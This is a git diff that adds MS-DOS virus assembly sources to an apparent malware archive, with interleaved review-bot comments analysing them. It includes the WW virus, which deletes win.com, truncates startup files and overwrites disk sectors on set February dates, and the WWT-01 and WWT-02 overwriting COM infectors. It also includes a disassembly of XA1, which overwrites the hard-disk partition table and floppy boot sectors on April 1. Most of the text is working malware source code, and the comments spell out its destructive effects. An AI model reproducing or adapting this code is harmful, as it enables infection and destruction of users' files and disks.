loc_3 ; Jump if equal + mov ax,5700h + int 21h ; DOS Services ah=function 57h + ; get file date+time, bx=handle + ; returns cx=time, dx=time + push cx + push dx + call sub_4 + pop dx + pop cx + mov ax,5701h + int 21h ; DOS Services ah=function 57h + ; set file date+time, bx=handle + ; cx=time, dx=time +loc_3: + mov ah,3Eh + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + 
+loc_ret_4: + retn +sub_1 endp + + +; +; SUBROUTINE +; + +sub_2 proc near + mov ax,3D02h + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + jc loc_ret_4 ; Jump if carry Set + xchg ax,bx + mov si,100h + call sub_3 + jc loc_3 ; Jump if carry Set + cmp word ptr [si+14h],100h + jne loc_3 ; Jump if not equal + mov ax,5700h + int 21h ; DOS Services ah=function 57h + ; get file date+time, bx=handle + ; returns cx=time, dx=time + push cx + push dx + call sub_5 + call sub_6 + pop dx + pop cx + mov ax,5701h + int 21h ; DOS Services ah=function 57h + ; set file date+time, bx=handle + ; cx=time, dx=time + jmp short loc_3 +sub_2 endp + + +; +; SUBROUTINE +; + +sub_3 proc near + call sub_8 + cmp word ptr [si],5A4Dh + jne loc_5 ; Jump if not equal + cmp word ptr [si+18h],40h + jb loc_5 ; Jump if below + mov ax,[si+3Ch] + mov dx,[si+3Eh] + call sub_16 + mov ds:data_20e,ax + mov ds:data_21e,dx + call sub_8 + cmp word ptr [si],454Eh + jne loc_5 ; Jump if not equal + cmp word ptr [si+0Ch],302h + jne loc_5 ; Jump if not equal + cmp byte ptr [si+32h],4 + jne loc_5 ; Jump if not equal + cmp word ptr [si+36h],802h + jne loc_5 ; Jump if not equal + clc ; Clear carry flag + retn +loc_5: + stc ; Set carry flag + +loc_ret_6: + retn +sub_3 endp + + +; +; SUBROUTINE +; + +sub_4 proc near + mov ax,[si+16h] + mov dx,140h + call sub_7 + cmp word ptr ds:data_13e,3AEh + jb loc_ret_6 ; Jump if below + cmp byte ptr ds:data_14e,50h ; 'P' + jne loc_ret_6 ; Jump if not equal + mov ax,[si+0Eh] + mov dx,148h + call sub_7 + cmp word ptr ds:data_16e,4A8h + jb loc_ret_6 ; Jump if below + mov ax,ds:data_12e + call sub_15 + mov dx,1A8h + mov cx,2AEh + nop + call sub_9 + call sub_13 + mov dx,1A8h + mov cx,2AEh + nop + call sub_12 + mov ax,word ptr ds:[148h] + call sub_15 + mov dx,1A8h + mov cx,0A8h + nop + call sub_9 + call sub_13 + mov dx,1A8h + mov cx,0A8h + nop + call sub_12 + push word ptr ds:[144h] + pop word ptr ds:[1A2h] + and word ptr ds:[144h],0FEFFh + mov ax,[si+16h] + mov 
dx,140h + call sub_10 + xor ax,ax ; Zero register + cwd ; Word to double word + call sub_14 + push word ptr [si+14h] + pop word ptr ds:[1A0h] + mov word ptr [si+14h],100h + call sub_11 + mov ax,word ptr ds:[140h] + call sub_15 + push ds + push cs + pop ds + mov dx,100h + mov cx,2AEh + nop + call sub_12 + pop ds + mov ax,word ptr ds:[148h] + call sub_15 + mov dx,100h + mov cx,0A8h + nop + call sub_12 + retn +sub_4 endp + + +; +; SUBROUTINE +; + +sub_5 proc near + mov ax,[si+0Eh] + mov dx,148h + call sub_7 + mov ax,ds:data_15e + call sub_15 + mov dx,100h + mov cx,0A8h + nop + call sub_9 + retn +sub_5 endp + + +; +; SUBROUTINE +; + +sub_6 proc near + push word ptr ds:data_23e + pop word ptr ds:data_14e + mov ax,[si+16h] + mov dx,140h + call sub_10 + push word ptr ds:data_22e + pop word ptr [si+14h] + xor ax,ax ; Zero register + cwd ; Word to double word + call sub_14 + call sub_11 + call sub_13 + sub ax,0A8h + nop + sbb dx,0 + push ax + push dx + call sub_16 + mov dx,1A8h + mov cx,0A8h + nop + call sub_9 + mov ax,ds:data_15e + call sub_15 + mov dx,1A8h + mov cx,0A8h + nop + call sub_12 + pop dx + pop ax + sub ax,2AEh + nop + sbb dx,0 + push ax + push dx + call sub_16 + mov dx,1A8h + mov cx,2AEh + nop + call sub_9 + mov ax,word ptr ds:[140h] + call sub_15 + mov dx,1A8h + mov cx,2AEh + nop + call sub_12 + pop dx + pop ax + call sub_16 + mov cx,0 + call sub_12 + retn +sub_6 endp + + +; +; SUBROUTINE +; + +sub_7 proc near + push dx + dec ax + mov cx,8 + mul cx ; dx:ax = reg * ax + add ax,[si+22h] + adc dx,0 + call sub_14 + pop dx + mov cx,8 + jmp short loc_7 + +; External Entry into Subroutine + +sub_8: + mov dx,data_11e + mov cx,40h + +; External Entry into Subroutine + +sub_9: +loc_7: + mov ah,3Fh + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + retn +sub_7 endp + + +; +; SUBROUTINE +; + +sub_10 proc near + push dx + dec ax + mov cx,8 + mul cx ; dx:ax = reg * ax + add ax,[si+22h] + adc dx,0 + call sub_14 + pop dx + 
mov cx,8 + jmp short loc_8 + +; External Entry into Subroutine + +sub_11: + mov dx,data_11e + mov cx,40h + +; External Entry into Subroutine + +sub_12: +loc_8: + mov ah,40h + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + retn +sub_10 endp + + +; +; SUBROUTINE +; + +sub_13 proc near + mov ax,4202h + xor cx,cx ; Zero register + cwd ; Word to double word + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + retn +sub_13 endp + + +; +; SUBROUTINE +; + +sub_14 proc near + add ax,ds:data_20e + adc dx,ds:data_21e + jmp short loc_9 + +; External Entry into Subroutine + +sub_15: + mov cx,10h + mul cx ; dx:ax = reg * ax + add ax,100h + adc dx,0 + jmp short loc_9 + db 33h,0C0h, 99h + +; External Entry into Subroutine + +sub_16: +loc_9: + xchg cx,dx + xchg ax,dx + mov ax,4200h + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + retn +sub_14 endp + + ;* No entry point to code + xchg cx,dx + xchg ax,dx + mov ax,4201h + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + retn + db ' Virus_for_Windows v1.4 ' + db 259 dup (0) + db 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' + db 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' + db 'bbbbbbbbccccccccdddddddddddddddd' + db 'ddddddddddddddddddddddddddd*.EXE' + db 0 + db 'eeeeeeeeeeeee' + db 00h, 00h, 80h, 00h, 00h, 00h + db 5Ch, 00h, 00h, 00h + db 6Ch + db 11 dup (0) + db 4Dh, 4Bh, 39h, 32h + db 8 dup (0) + +seg_a ends + + + +;------------------------------------------------------ stack_seg_b ---- + +stack_seg_b segment word stack 'STACK' + + db 8192 dup (0) + +stack_seg_b ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.ww.asm b/MSDOS/Virus.MSDOS.Unknown.ww.asm new file mode 100644 index 00000000..333daa65 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.ww.asm 
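Review bot: This file is byte-for-byte the same listing as MSDOS/Virus.MSDOS.Unknown.wvir14.asm added by the same commit: both `index` lines resolve to blob `744f5354`, and the `WVIR14` header, the `data_*` equates and every routine match line for line. If `wvir14a` is meant to catalogue a distinct sample, the listing should open with a comment stating how it differs from wvir14 (nothing visible does); otherwise the duplicate should be dropped or reduced to a one-line cross-reference in wvir14.asm, since two identical sources under different names invite divergent annotation later.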
@@ -0,0 +1,225 @@ +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +ww proc far + +start: + jmp loc_2 + db 12 dup (90h) + db 0CDh, 20h +loc_2: + jmp short loc_3 + db 90h, 2Ah, 2Eh, 63h, 6Fh, 6Dh + db 00h, 00h +data_8 db 'C:\Command.Com', 0 + db 'C:\Autoexec.Bat', 0 + db 'C:\Config.Sys', 0 + db '\win' +data_12 dw 6F64h + db 'ws\win.com' + db 00h,0E9h, 0Eh, 00h, 90h,0C8h + db 01h +loc_3: + mov bx,101h + mov ah,[bx] + mov bx,102h + mov al,[bx] + xchg al,ah + add ax,3 + mov si,ax + mov ah,1Ah + lea dx,[si+2C8h] + add dx,6 + int 21h + + mov ah,4Eh + lea dx,[si+103h] + mov cx,6 + int 21h + + cmp ax,12h + je loc_7 + lea dx,[si+10Ah] + jmp short loc_6 + db 90h +loc_5: + mov ah,4Dh + int 21h + + mov ah,4Fh + int 21h + + cmp ax,12h + je loc_7 + lea dx,[si+2C8h] + add dx,24h +loc_6: + mov ah,3Dh + mov al,2 + int 21h + + mov bx,ax + mov ah,42h + mov al,2 + mov dx,0 + mov cx,0 + int 21h + + + push ax + sub ax,6 + mov dx,ax + mov ah,42h + mov al,0 + mov cx,0 + int 21h + + + mov ah,3Fh + mov cx,1 + lea dx,[si+14Bh] + int 21h + + + mov ah,byte ptr data_8+30h[si] + cmp ah,42h + jne loc_8 + jmp short loc_5 +loc_7: + jmp short loc_9 + db 90h +loc_8: + mov ah,42h + mov al,0 + mov dx,0 + mov cx,0 + int 21h + + + mov ax,3F00h + mov cx,3 + lea dx,[si+2C8h] + add dx,3 + int 21h + + + mov ax,4200h + mov dx,0 + mov cx,0 + int 21h + + + pop ax + sub ax,3 + mov byte ptr data_8+2Eh[si],al + mov byte ptr data_8+2Fh[si],ah + mov ah,40h + mov cx,3 + lea dx,[si+148h] + int 21h + + + mov ax,4202h + mov dx,0 + mov cx,0 + int 21h + + + mov ah,40h + lea dx,[si+100h] + mov cx,data_12[si] + int 21h + + + mov ax,4000h + lea dx,[si+2C8h] + add dx,3 + mov cx,3 + int 21h + + + jmp short loc_9 + db 90h +loc_9: + mov ah,3Eh + int 21h + + mov ah,41h + lea dx,[si+137h] + int 21h + + mov ah,2Ah + int 21h + + + cmp dh,2 + jne loc_14 + cmp dl,17h + je loc_10 + cmp dl,18h + je loc_11 + cmp dl,19h + je loc_12 + jmp short loc_14 + db 90h +loc_10: + mov ah,3Ch + lea dx,[si+119h] + mov cx,1 + int 
21h + + jmp short loc_14 + db 90h +loc_11: + mov ah,3Ch + lea dx,[si+129h] + mov cx,1 + int 21h + + jmp short loc_14 + db 90h +loc_12: + mov al,2 +loc_13: + mov cx,96h + mov dx,0 + int 26h + + + + inc al + cmp al,4 + jne loc_13 +loc_14: + mov cx,3 + lea ax,[si+2C8h] + mov si,ax + mov di,100h + rep movsb + call sub_1 + int 20h + +ww endp + +sub_1 proc near + mov di,offset start + jmp di + db 'Why Windows ' +copyright db '(c)1992 MaZ / BetaBoys B.B' + db 90h, 90h, 90h +sub_1 endp + + +seg_a ends + + + + end start + +; +; > and Remember Don't Forget to Call < +; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < +; diff --git a/MSDOS/Virus.MSDOS.Unknown.wwt-01.asm b/MSDOS/Virus.MSDOS.Unknown.wwt-01.asm new file mode 100644 index 00000000..48817468 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.wwt-01.asm 
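Review bot: The listing has no description of its payload, which is the most security-relevant part of the code: after the infection loop, `loc_9` issues `mov ah,41h` / `lea dx,[si+137h]` / `int 21h` on every run, and `loc_10`-`loc_13` key on `int 21h` `ah=2Ah` returning `dh=2` with `dl=17h/18h/19h` to create-and-truncate the files at `[si+119h]` and `[si+129h]` with `ah=3Ch`, then on the third date loop `int 26h` with `cx=96h`, `dx=0` for `al=2` and `al=3`. Working the `si` delta from the word read at 101h (the `jmp loc_2` displacement plus 3, i.e. 11h for the unmodified body), those offsets land on `\windows\win.com`, `C:\Autoexec.Bat` and `C:\Config.Sys`, so the header should state: `; Payload: deletes \windows\win.com on every run; 23 Feb truncates C:\Autoexec.Bat, 24 Feb C:\Config.Sys, 25 Feb overwrites the first 96h sectors of drives C: and D: via INT 26h` — offsets worth re-deriving against an assembled image before relying on them. Note also that `int 26h` is issued with whatever `bx` still holds (the handle just closed at `loc_9`, or 102h on the no-file path), so the sectors are overwritten with arbitrary memory rather than a crafted buffer.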
@@ -0,0 +1,78 @@
+
+PAGE 59,132
+
+;
+;
+; WWT-01
+;
+; Created: 15-Mar-91
+; Passes: 5 Analysis Options on: none
+;
+;
+
+data_009E_e equ 9Eh
+
+seg_a segment byte public
+ assume cs:seg_a, ds:seg_a
+
+
+ org 100h
+
+wwt-01 proc far
+
+start:
+ mov dx,offset data_013D
+ mov ah,4Eh ; 'N'
+ mov cx,1
+ int 21h ; DOS Services ah=function 4Eh
+ ; find 1st filenam match @ds:dx
+ jnc loc_010E ; Jump if carry=0
+ jmp short loc_012C
+loc_010E:
+ mov dx,data_009E_e
+ mov ax,3D02h
+ int 21h ; DOS Services ah=function 3Dh
+ ; open file, al=mode,name@ds:dx
+ jnc loc_011A ; Jump if carry=0
+ jmp short loc_012C
+loc_011A:
+ mov bx,ax
+ call sub_012E
+ mov dx,80h
+ mov ah,4Fh ; 'O'
+ int 21h ; DOS Services ah=function 4Fh
+ ; find next filename match
+ jnc loc_012A ; Jump if carry=0
+ jmp short loc_012C
+loc_012A:
+ jmp short loc_010E
+loc_012C:
+ int 20h ; DOS program terminate
+
+wwt-01 endp
+
+;
+; SUBROUTINE
+;
+
+sub_012E proc near
+ mov dx,100h
+ mov ah,40h ; '@'
+ mov cx,43h
+ int 21h ; DOS Services ah=function 40h
+ ; write file bx=file handle
+ ; cx=bytes from ds:dx buffer
+ mov ah,3Eh ; '>'
+ int 21h ; DOS Services ah=function 3Eh
+ ; close file, bx=file handle
+ retn
+sub_012E endp
+
+data_013D db 2Ah
+ db 2Eh, 43h, 4Fh, 4Dh, 00h
+
+seg_a ends
+
+
+
+ end start
diff --git a/MSDOS/Virus.MSDOS.Unknown.wwt-02.asm b/MSDOS/Virus.MSDOS.Unknown.wwt-02.asm
new file mode 100644
index 00000000..45ee259d
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.wwt-02.asm
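Review bot: `wwt-01 proc far` / `wwt-01 endp` carry the Sourcer-generated file name as an identifier, and the hyphen makes an assembler parse it as `wwt - 01`, so this listing is a read-only disassembly rather than buildable source; a header line such as `; Sourcer listing, not assemblable as-is (hyphenated proc name)` would save readers a rebuild attempt. The header otherwise says nothing about behaviour: `sub_012E` writes `43h` bytes from `100h` at the current file position (offset 0, straight after the `3D02h` open) and closes, with no size check and no infection marker, so every `*.COM` in the current directory has its first 43h bytes replaced by the virus body and the host is destroyed; `43h` appears to be the hard-coded distance from `100h` to the end of `data_013D`. Suggest stating that in the header instead of leaving it to be inferred from the per-`int 21h` function comments.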
@@ -0,0 +1,73 @@
+; Virus name WWT-02
+; Description Attack any COM file in current directory
+; Comment Don't change Date/Time, ignore ReadOnly
+; Date 19 Dec 1990 15:30
+; Place CICTT
+;
+ mov dx,offset FileMask ; FileMask for any COM file
+ mov ah,4eh ; Find first file
+ mov cx,1 ; including attrib Archive
+ int 21h ; Call DOS
+ jnc Ok ; If no error -> go on
+ jmp short Exit ; If error -> exit program
+
+Ok
+ call Infect ; Do infection
+
+DoNext
+ mov dx,80h ; Set DS:DX to DTA
+ mov ah,4fh ; Find Next file
+ int 21h ; Call DOS
+ jnc NextOk ; If no error -> go on
+ jmp short Exit ; If error -> exit
+NextOk
+ jmp short Ok ; Still next file exist
+
+Exit
+ int 20h ; Exit to DOS
+
+Infect
+ mov dx,9eh ; Set DS:DX to filename in DTA
+ mov ax,4300h ; Get file attribute
+ int 21h ; Call DOS
+ mov Attrib,cx ; Save attribute for later
+ xor cx,cx ; New attribute -> normal file
+ mov ax,4301h ; Set attribute
+ int 21h ; Call DOS
+ mov ax,3d02h ; Open file for Read/Write
+ int 21h ; Call DOS
+ jc Exit ; If error -> exit
+ mov bx,ax ; Save handle
+ mov ax,5700h ; Get file Date/Time
+ int 21h ; Call DOS
+ mov Date,dx ; Save date
+ mov Time,cx ; Save time
+ mov dx,100h ; DS:DX point to itself
+ mov ah,40h ; Write to handle
+ mov cx,offset VirusSize-100h ; Write only virus
+ int 21h ; Call DOS
+ mov ax,5701h ; Restore Date/Time
+ mov cx,Time ; Old time
+ mov dx,Date ; Old time
+ int 21h ; Call DOS
+ mov ah,3eh ; Close file
+ int 21h ; Call DOS
+ mov dx,9eh ; Set DS:DX to filename in DTA
+ mov cx,Attrib ; Restore attribute
+ mov ax,4301h ; Set file attribute
+ int 21h ; Call DOS
+ ret ; Return to caller
+
+
+FileMask
+ db '*.COM',0 ; File mask for any COM file
+Date
+ dw ?
+Time
+ dw ?
+Attrib
+ dw ?
+VirusSize
+ db ? ; Used to calculate virus
+ ; size
+
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.xa1.asm b/MSDOS/Virus.MSDOS.Unknown.xa1.asm
new file mode 100644
index 00000000..ac2e8aed
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.xa1.asm
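Review bot: In `Infect`, the victim's attributes are cleared (`xor cx,cx` / `mov ax,4301h`) before the `3d02h` open, but the open-failure path `jc Exit` terminates without ever reaching the restoring `mov cx,Attrib` / `mov ax,4301h`, so a file whose open fails is left with its read-only/hidden bits stripped while remaining uninfected — worth recording, since it is a usable forensic indicator: `; NOTE: on open failure attributes are NOT restored (Exit is reached with them cleared)`. The comment on `mov dx,Date ; Old time` should read `; Old date`. The colon-less labels and the absence of `org`/segment directives suggest an A86-style source rather than MASM; a header line naming the assembler would help anyone reading it against the Sourcer listings elsewhere in this directory.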
@@ -0,0 +1,909 @@ +;============================================== +; Virus XA1 isolated in Poland in June 1991 +; +; disassembled by Andrzej Kadlof July 1991 +; +; (C) Polish Section of Virus Information Bank +;============================================== + +; virus entry point + +0100 EB07 jmp 0109 + +0102 56 0A 03 59 00 ; first 7 bytes forms virus signature +0107 2A 00 ; generation counter, never used (?) + +; prepare stack for tricks +; stack usage: +; [BP + 2] cleared but not used +; [BP + 0] offset in block +; [BP - 2] low byte of size of decrypted part and encryption key + +0109 0E push cs ; make free space on stack +010A E80000 call 010D ; put current offset on the stack +010D FA cli ; disable interrupt to safe stack +010E 8BEC mov bp,sp +0110 58 pop ax +0111 32C0 xor al,al +0113 894602 mov [bp+02],ax ; corrupt debbuger return address ?? +0116 8146002800 add word ptr [bp],0028 ; offset of first byte to encrypt + +; encrypt virus code, this routine is changed in different virus copies + +011B B9CE05 mov cx,05CE ; length of decrypted block +011E B08C mov al,8C ; 8C is changed! +0120 8846FF mov [bp-01],al +0123 8B5E00 mov bx,[bp] ; current position in block +; ^^ changed, possible 3 wariants: +; ..5E.. mov bx,[bp] versions 0, 1, 2 +; ..76.. mov si,[bp] versions 3, 4, 5 +; ..7E.. 
mov di,[bp] versions 6, 7, 8 + +0126 884EFE mov [bp-02],cl ; low byte of counter +0129 8A4EFF mov cl,[bp-01] ; encrypt key +012C D207 rol byte ptr [bx],cl ; byte manipulation +; ^^^^ changed, possible 9 wariants: +; 000F add byte ptr [bx],cl version 0 +; 300F xor byte ptr [bx],cl version 1 +; D2O7 rol byte ptr [bx],cl version 2 +; 000C add byte ptr [si],cl version 3 +; 300C xor byte ptr [si],cl version 4 +; D204 rol byte ptr [si],cl version 5 +; 000D add byte ptr [di],cl version 6 +; 300D xor byte ptr [di],cl version 7 +; D205 rol byte ptr [di],cl version 8 + +012E EB00 jmp 0130 ; short pause +0130 43 inc bx ; position in block +; ^^ changed, possible 3 wariants: +; 43 inc bx version 0, 1, 2 +; 46 inc si version 3, 4, 5 +; 47 inc di version 6, 7, 8 + +0131 8A4EFE mov cl,[bp-02] ; restore block size +0134 E2F0 loop 0126 ; offset is decrypted! + +; encrypted part + +0136 FB sti + +; get address of curent DTA and store it on the stack + +0137 B42F mov ah,2F +0139 CD21 int 21 +013B 06 push es +013C 53 push bx + +; get keyboard status bits + +013D 33C0 xor ax,ax +013F 8ED8 mov ds,ax +0141 A01704 mov al,[0417] +0144 2410 and al,10 ; extract scroll lock state +0146 50 push ax ; store +0147 80261704EF and byte ptr [0417],EF ; clear scroll lock flag + +; restore DS + +014C 8CC8 mov ax,cs +014E 8ED8 mov ds,ax + +; intercepte INT 24h + +0150 BAC606 mov dx,06C6 +0153 B82425 mov ax,2524 ; set interrupt vector +0156 CD21 int 21 + +; search for PATH= in environment block + +0158 A12C00 mov ax,[002C] ; segment of environment block +015B 8EC0 mov es,ax +015D 33FF xor di,di ; begin of environment block +015F FC cld + +0160 26803D00 cmp es:byte ptr [di],00 ; end of block marker +0164 741D je 0183 ; end fo block + +0166 BE1B05 mov si,051B ; offset of string 'PATH=' +0169 B90500 mov cx,0005 ; length of string +016C 8BC7 mov ax,di ; starting address +016E F3A6 rep cmpsb ; compare +0170 7411 je 0183 ; found + +0172 8BF8 mov di,ax ; last starting point +0174 32C0 xor al,al +0176 B5FF mov 
ch,FF ; maximum block size +0178 F2AE repnz scasb +017A 74E4 je 0160 + +017C BF1A05 mov di,051A ; end of buffer for path +017F 8CC8 mov ax,cs ; restore ES +0181 8EC0 mov es,ax +0183 C706C1056205 mov word ptr [05C1],0562 + +; set local DTA + +0189 BA3605 mov dx,0536 +018C B41A mov ah,1A ; set DTA +018E CD21 int 21 + +0190 A1F906 mov ax,[06F9] +0193 A3F706 mov [06F7],ax +0196 A1FD06 mov ax,[06FD] +0199 A3FB06 mov [06FB],ax +019C B90500 mov cx,0005 ; counter of potential victims +019F BA1505 mov dx,0515 ; '*.COM', 0 +01A2 06 push es +01A3 57 push di +01A4 51 push cx + +01A5 8CC8 mov ax,cs +01A7 8EC0 mov es,ax +01A9 B9FFFF mov cx,FFFF ; all possible attributes +01AC B44E mov ah,4E ; find first +01AE EB06 jmp 01B6 + +01B0 59 pop cx ; restore counter +01B1 E35B jcxz 020E ; limit reached, check show/destruction + +01B3 B44F mov ah,4F ; find next +01B5 51 push cx ; store counter + +01B6 CD21 int 21 +01B8 7203 jb 01BD ; continue + +01BA E9F100 jmp 02AE + +; restore address of path in environment block + +01BD 59 pop cx +01BE 5F pop di +01BF 07 pop es + +01C0 26803D00 cmp es:byte ptr [di],00 ; end of block? +01C4 744A je 0210 ; yes + +; copy path to buffer + +01C6 BB6205 mov bx,0562 ; offset of buffer + +01C9 268A05 mov al,es:[di] ; next character +01CC 0AC0 or al,al ; end of block? +01CE 740A je 01DA ; yes + +01D0 47 inc di +01D1 3C3B cmp al,3B ; ';', end of path? +01D3 7405 je 01DA ; yes + +01D5 8807 mov [bx],al ; copy character +01D7 43 inc bx ; increase pointer +01D8 EBEF jmp 01C9 ; get next character + +01DA 81FB6205 cmp bx,0562 ; buffer not empty? 
+01DE 74E0 je 01C0 ; empty + +01E0 8A47FF mov al,[bx-01] +01E3 3C3A cmp al,3A ; ':', root directory +01E5 7408 je 01EF ; yes + +01E7 3C5C cmp al,5C ; check last character, '\' +01E9 7404 je 01EF ; there is + +01EB C6075C mov byte ptr [bx],5C ; add '\' +01EE 43 inc bx ; pointer to last character +01EF 06 push es +01F0 57 push di +01F1 51 push cx +01F2 891EC105 mov [05C1],bx ; store it +01F6 8BF3 mov si,bx +01F8 81EB6205 sub bx,0562 ; find path length +01FC 8BCB mov cx,bx +01FE BF1405 mov di,0514 ; destination buffer +0201 8CC8 mov ax,cs ; restore ES +0203 8EC0 mov es,ax +0205 4E dec si +0206 FD std +0207 F3A4 rep movsb ; copy +0209 8BD7 mov dx,di +020B 42 inc dx +020C EB97 jmp 01A5 ; find first + +; end of infection proces, check condition for destruction/show + +020E 58 pop ax ; balance stack +020F 58 pop ax + +0210 8CC8 mov ax,cs ; restore ES +0212 8EC0 mov es,ax + +; get date + +0214 B42A mov ah,2A ; get date +0216 CD21 int 21 + +0218 81FA0104 cmp dx,0401 ; April 1? +021C 7533 jne 0251 ; no + +;<><><><><><><><><><><><><><><><><><><><><><><><><><><><> +; +; DESTRUCTION OF HARD DISK AND FLOPPIES IN A: AND B: +; +;<><><><><><><><><><><><><><><><><><><><><><><><><><><><> + +; copy partition table to sector 11h of side 0, track 0 + +021E BA8000 mov dx,0080 ; first hard drive +0221 B90100 mov cx,0001 ; track 0 sector 1 (partition table) +0224 BB0307 mov bx,0703 ; destroy victim code +0227 B80102 mov ax,0201 ; read 1 sector +022A 52 push dx +022B 51 push cx +022C 53 push bx +022D CD13 int 13 ; disk I/O +022F 5B pop bx +0230 59 pop cx +0231 5A pop dx +0232 B111 mov cl,11 ; new place for partition table +0234 B80103 mov ax,0301 ; write partition table +0237 CD13 int 13 + +; set and of sector marker in the buffer + +0239 C706350855AA mov word ptr [0835],AA55 ; end of sector marker + +; overwrite partition table + +023F B280 mov dl,80 +0241 E87404 call 06B8 ; write one sector to disk + +; overwrite boot sector of drive A: + +0244 32D2 xor dl,dl +0246 E86F04 call 06B8 ; 
write one sector do disk + +; overwrite boot sector of drive B: + +0249 B201 mov dl,01 +024B E86A04 call 06B8 ; write disk + +024E EB0A jmp 025A +0250 90 nop + +; compare date + +0251 81FA180C cmp dx,0C18 ; december 24? +0255 7203 jb 025A ; date earlier + +;<><><><<><><><><><><><><><><><><><><><> +; +; CHRISTMAS SHOW +; +; see the description of subroutine 05D7 +;<><><><><><><><><><><><><><><><><><><><><> + +0257 E87D03 call 05D7 ; drow christmas tree + +; make sound + +025A E440 in al,40 +025C 3CF8 cmp al,F8 +025E 7206 jb 0266 + +0260 E461 in al,61 +0262 0C03 or al,03 +0264 E661 out 61,al + +; restore the state of scroll lock flag + +0266 33C0 xor ax,ax +0268 8ED8 mov ds,ax +026A 58 pop ax +026B 08061704 or [0417],al + +; restore INT 24h + +026F 2E8E1E1400 mov ds,cs:[0014] ; segment of INT 24h in PSP +0274 2E8B161200 mov dx,cs:[0012] ; offset of INT 24h in PSP +0279 B82425 mov ax,2524 ; set interrupt vector +027C CD21 int 21 + +; restore DTA + +027E 5A pop dx +027F 1F pop ds +0280 B41A mov ah,1A ; set DTA +0282 CD21 int 21 + +; restore DS + +0284 8CC8 mov ax,cs +0286 8ED8 mov ds,ax + +0288 BEF006 mov si,06F0 +028B 8B3EF706 mov di,[06F7] +028F 033EFB06 add di,[06FB] +0293 57 push di +0294 B90700 mov cx,0007 +0297 FC cld +0298 F3A4 rep movsb +029A 33C0 xor ax,ax +029C 8BD8 mov bx,ax +029E 8BD0 mov dx,ax +02A0 8BE8 mov bp,ax + +02A2 8B36F706 mov si,[06F7] +02A6 BF0001 mov di,0100 +02A9 8B0EFB06 mov cx,[06FB] +02AD C3 ret + +02AE BE5405 mov si,0554 ; file name in FCB +02B1 8B3EC105 mov di,[05C1] ; address of destination +02B5 B90D00 mov cx,000D ; length of asciiz string +02B8 FC cld +02B9 F3A4 rep movsb ; copy +02BB BF2005 mov di,0520 ; buffer for file name +02BE E8FA01 call 04BB ; copy +02C1 7503 jne 02C6 + +02C3 E9EAFE jmp 01B0 ; find next/destruct/show + +02C6 BF2B05 mov di,052B +02C9 E8EF01 call 04BB ; copy file name +02CC 7503 jne 02D1 + +02CE E9DFFE jmp 01B0 ; find next/destruct/show + +02D1 C606610500 mov byte ptr [0561],00 +02D6 90 nop +02D7 F6064B0507 test 
byte ptr [054B],07 ; attribute byte in DTA +02DC 740F je 02ED ; hiden, system or read only, open file + +02DE BA6205 mov dx,0562 ; file name +02E1 33C9 xor cx,cx ; clear all attributes +02E3 B80143 mov ax,4301 ; set file attributes +02E6 CD21 int 21 +02E8 7303 jnb 02ED ; open file + +02EA E9C3FE jmp 01B0 ; find next/destruct/show + +02ED BA6205 mov dx,0562 +02F0 B8023D mov ax,3D02 ; open file for read/write +02F3 CD21 int 21 + +02F5 8BD8 mov bx,ax ; handle +02F7 7303 jnb 02FC + +02F9 E9B4FE jmp 01B0 ; find next + +; check file size + +02FC A15205 mov ax,[0552] ; high word of file size in DTA +02FF 0BC0 or ax,ax +0301 7403 je 0306 ; file below 64K + +0303 E99001 jmp 0496 ; close file and find next + +0306 A15005 mov ax,[0550] ; lower word of file size +0309 3D0700 cmp ax,0007 ; minimum file size +030C 72F5 jb 0303 ; close file and find next + +030E 3D00F8 cmp ax,F800 ; maximum file size +0311 73F0 jnb 0303 ; close file and find next + +; mayby already infected? + +0313 8B16F706 mov dx,[06F7] ; form address of bufer +0317 0316FB06 add dx,[06FB] +031B B90700 mov cx,0007 ; number of bytes +031E 52 push dx +031F 51 push cx +0320 B43F mov ah,3F ; read file +0322 CD21 int 21 + +0324 59 pop cx +0325 5E pop si +0326 7208 jb 0330 ; read error, close and find next + +; compare first 7 bytes with own code + +0328 BF0001 mov di,0100 ; destination +032B FC cld +032C F3A6 rep cmpsb +032E 7503 jne 0333 + +0330 E96301 jmp 0496 ; close file and find next, (infected!) 
+ +; get and store file date and time + +0333 B80057 mov ax,5700 ; get file time stamp +0336 CD21 int 21 +0338 72F6 jb 0330 ; close file, find next + +033A 89160107 mov [0701],dx ; store date +033E 890EFF06 mov [06FF],cx ; store time +0342 C606610501 mov byte ptr [0561],01 +0347 90 nop + +; check file size, if less than 603h bytes then append some garbage + +0348 A15005 mov ax,[0550] ; file size +034B 3D0306 cmp ax,0603 +034E 7321 jnb 0371 + +; file length is less than 603h, add some garbage + +0350 33D2 xor dx,dx +0352 33C9 xor cx,cx +0354 B80242 mov ax,4202 ; move file ptr to EOF +0357 CD21 int 21 +0359 7303 jnb 035E ; no errors, continue + +035B E93801 jmp 0496 ; close file and find next + +035E B90306 mov cx,0603 ; number of bytes +0361 2B0E5005 sub cx,[0550] ; file size +0365 B440 mov ah,40 ; write file +0367 CD21 int 21 +0369 B80306 mov ax,0603 ; new file size +036C 7303 jnb 0371 + +036E E92501 jmp 0496 ; close file and find next + +; now file is at least 603h bytes long + +0371 FEC4 inc ah +0373 A3F906 mov [06F9],ax ; oryginal file size + 256 +0376 A15005 mov ax,[0550] ; file size +0379 BE0306 mov si,0603 ; virus length +037C 33FF xor di,di +037E 3BC6 cmp ax,si +0380 7302 